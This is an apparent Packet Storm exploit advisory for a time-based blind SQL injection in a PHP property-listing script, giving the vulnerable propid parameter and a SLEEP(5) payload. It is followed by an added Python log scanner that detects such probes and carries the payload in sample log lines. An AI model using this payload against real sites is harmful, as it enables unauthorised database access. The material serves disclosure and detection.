Property Listing Script Blind SQL Injection

2017-02-02T00:00:00
ID PACKETSTORM:140903
Type packetstorm
Reporter Kaan KAMIS
Modified 2017-02-02T00:00:00

Description

`Exploit Title: Property Listing Script - Time-Based Blind Injection  
Date: 02.02.2017  
Vendor Homepage: http://phprealestatescript.org/  
Software Link: http://phprealestatescript.org/property-listing-script.html  
Exploit Author: Kaan KAMIS  
Contact: iletisim[at]k2an[dot]com  
Website: http://k2an.com  
Category: Web Application Exploits  
  
Overview  
  
Advanced PHP Real-Estate Script: we have almost covered the main features required for a property buy and sell listing script.  
  
Vulnerable URL: http://localhost/property-list/property_view.php?propid=443[payload]  
Parameter: propid (GET)  
Type: AND/OR time-based blind  
  
Simple Payload:  
Payload: propid=443' AND SLEEP(5) AND 'FBop'='FBop  
  
`
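
A defensive check for the request pattern described above, added here as an example and not part of the original advisory: it scans combined-format access log lines for `property_view.php` requests whose `propid` is not a plain integer and flags values that contain SQL delay functions. The log lines are constructed samples, and the rule that `propid` must be a decimal integer is an assumption inferred from the `443` in the advisory's URL.

```python
import re
from urllib.parse import urlsplit, parse_qs

# SQL delay primitives typical of time-based blind probes (illustrative list).
DELAY_RE = re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)
# Request target inside a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP range); line 2 carries the advisory's payload.
SAMPLE_LOG = [
    '198.51.100.7 - - [02/Feb/2017:10:00:01 +0000] '
    '"GET /property-list/property_view.php?propid=443 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [02/Feb/2017:10:00:05 +0000] '
    '"GET /property-list/property_view.php?propid=443%27%20AND%20SLEEP(5)'
    '%20AND%20%27FBop%27=%27FBop HTTP/1.1" 200 5120',
    '198.51.100.9 - - [02/Feb/2017:10:00:12 +0000] '
    '"GET /property-list/property_view.php?propid=abc HTTP/1.1" 200 312',
    '198.51.100.7 - - [02/Feb/2017:10:00:20 +0000] '
    '"GET /property-list/index.php HTTP/1.1" 200 900',
]

def classify_propid(value):
    """Classify a decoded propid value: 'ok', 'time-based-sqli' or 'non-numeric'."""
    if re.fullmatch(r"[0-9]+", value):  # assumption: valid ids are decimal integers
        return "ok"
    if DELAY_RE.search(value):
        return "time-based-sqli"
    return "non-numeric"

def scan(lines, script="property_view.php", param="propid"):
    """Return (line_number, verdict, decoded_value) for each suspicious request."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/" + script):
            continue
        # parse_qs percent-decodes the value, so encoded quotes and spaces are seen.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            verdict = classify_propid(value)
            if verdict != "ok":
                findings.append((n, verdict, value))
    return findings

if __name__ == "__main__":
    for n, verdict, value in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict}: {value!r}")
```

The same integer-only rule, enforced server-side before the value reaches the query (together with a parameterized statement), closes the injection point that the log check only observes.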